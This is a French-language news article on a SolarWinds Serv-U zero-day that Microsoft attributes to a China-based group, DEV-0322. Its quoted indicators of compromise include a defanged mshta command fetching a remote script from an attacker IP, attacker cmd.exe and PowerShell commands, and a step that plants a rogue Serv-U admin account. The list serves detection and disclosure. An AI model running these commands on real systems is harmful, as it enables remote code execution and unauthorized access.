SolarWinds 0-day a donné aux pirates chinois un accès privilégié aux serveurs des clients

[ad_1]

Microsoft a déclaré mardi que des pirates informatiques opérant en Chine avaient exploité une vulnérabilité zero-day dans un produit SolarWinds. Selon Microsoft, les pirates ciblaient, selon toute vraisemblance, des sociétés de logiciels et l’industrie américaine de la défense.

SolarWinds a révélé le jour zéro lundi, après avoir reçu une notification de Microsoft lui indiquant qu’une vulnérabilité jusque-là inconnue dans la gamme de produits SolarWinds Serv-U était sous exploitation active. SolarWinds, basé à Austin, au Texas, n’a fourni aucun détail sur l’acteur de la menace derrière les attaques ou sur le fonctionnement de leur attaque.

VPN commerciaux et routeurs grand public compromis

Mardi, Microsoft a déclaré qu’il désignait le groupe de piratage pour l’instant sous le nom de « DEV-0322″. « DEV » fait référence à un « groupe de développement » à l’étude avant le moment où les chercheurs de Microsoft ont une grande confiance en l’origine ou l’identité de l’acteur derrière une opération. La société a déclaré que les attaquants sont physiquement situés en Chine et s’appuient souvent sur des botnets composés de routeurs ou d’autres types d’appareils IoT.

« Le MSTIC a observé que le DEV-0322 ciblait des entités dans le secteur américain de la base industrielle de défense et des sociétés de logiciels », ont écrit des chercheurs du Microsoft Threat Intelligence Center dans un article. « Ce groupe d’activités est basé en Chine et a été observé en utilisant des solutions VPN commerciales et des routeurs grand public compromis dans leur infrastructure d’attaquant. »

Au-delà des trois serveurs affiliés aux attaquants déjà divulgués par SolarWinds, Microsoft a fourni trois indicateurs supplémentaires que les gens peuvent utiliser pour déterminer s’ils ont été piratés. Les indicateurs de compromis sont :

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:WindowsTempServ-U.bat
  • C:WindowsTemptestcurrent.dmp
  • La présence d’erreurs d’exception suspectes, notamment dans le fichier journal DebugSocketlog.txt
  • C:WindowsSystem32mshta.exe http://144[.]34[.]179[.]162/a (défangé)
  • cmd.exe /c whoami > « ./Client/Common/redacted.txt »
  • cmd.exe /c dir > « .ClientCommonredacted.txt »
  • cmd.exe /c « C:WindowsTempServ-U.bat »
  • powershell.exe C:WindowsTempServ-U.bat
  • cmd.exe /c tapez redactedredacted.Archive > « C:ProgramDataRhinoSoftServ-UUsersGlobal Usersredacted.Archive »

Le message de mardi a également fourni de nouveaux détails techniques sur l’attaque. Spécifiquement:

Nous avons observé que DEV-0322 acheminait la sortie de ses commandes cmd.exe vers des fichiers du dossier Serv-U ClientCommon, accessible par défaut depuis Internet, afin que les attaquants puissent récupérer les résultats des commandes. L’acteur a également été trouvé en train d’ajouter un nouvel utilisateur global à Serv-U, s’ajoutant effectivement en tant qu’administrateur Serv-U, en créant manuellement un fichier .Archive spécialement conçu dans le répertoire des utilisateurs globaux. Les informations utilisateur de Serv-U sont stockées dans ces fichiers .Archive.

En raison de la façon dont DEV-0322 a écrit leur code, lorsque l’exploit compromet avec succès le processus Serv-U, une exception est générée et enregistrée dans un fichier journal Serv-U, DebugSocketLog.txt. Le processus pouvait également se bloquer après l’exécution d’une commande malveillante.

En examinant la télémétrie, nous avons identifié les caractéristiques de l’exploit, mais pas une vulnérabilité de cause première. MSTIC a travaillé avec l’équipe Microsoft Offensive Security Research, qui a effectué une recherche de vulnérabilité sur le binaire Serv-U et a identifié la vulnérabilité grâce à une analyse de la boîte noire. Une fois la cause première trouvée, nous avons signalé la vulnérabilité à SolarWinds, qui a réagi rapidement pour comprendre le problème et créer un correctif.

La vulnérabilité zero-day, qui est suivie comme CVE-2021-35211, réside dans le produit Serv-U de SolarWinds, que les clients utilisent pour transférer des fichiers sur les réseaux. Lorsque le Serv-U SSH est exposé à Internet, les exploits donnent aux attaquants la possibilité d’exécuter à distance un code malveillant avec des privilèges système élevés. À partir de là, les attaquants peuvent installer et exécuter des charges utiles malveillantes, ou ils peuvent afficher et modifier des données.

SolarWinds est devenu un nom familier du jour au lendemain fin décembre lorsque les chercheurs ont découvert qu’il était au centre d’une attaque de chaîne d’approvisionnement de portée mondiale. Après avoir compromis le système de construction de logiciels de SolarWinds, les attaquants ont utilisé leur accès pour envoyer une mise à jour malveillante à environ 18 000 clients de l’outil de gestion de réseau Orion de l’entreprise.

Sur ces 18 000 clients, environ neuf d’entre eux dans des agences gouvernementales américaines et environ 100 d’entre eux dans le secteur privé ont reçu des logiciels malveillants de suivi. Le gouvernement fédéral a attribué les attaques au service de renseignement étranger de la Russie, qui est abrégé en SVR. Pendant plus d’une décennie, le SVR a mené des campagnes de malware ciblant les gouvernements, les groupes de réflexion politiques et d’autres organisations à travers le monde.

Les attaques zero-day découvertes et signalées par Microsoft ne sont pas liées à l’attaque de la chaîne d’approvisionnement d’Orion.

SolarWinds a corrigé la vulnérabilité au cours du week-end. Toute personne exécutant une version vulnérable de Serv-U doit mettre à jour immédiatement et rechercher des signes de compromission.

[ad_2]

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*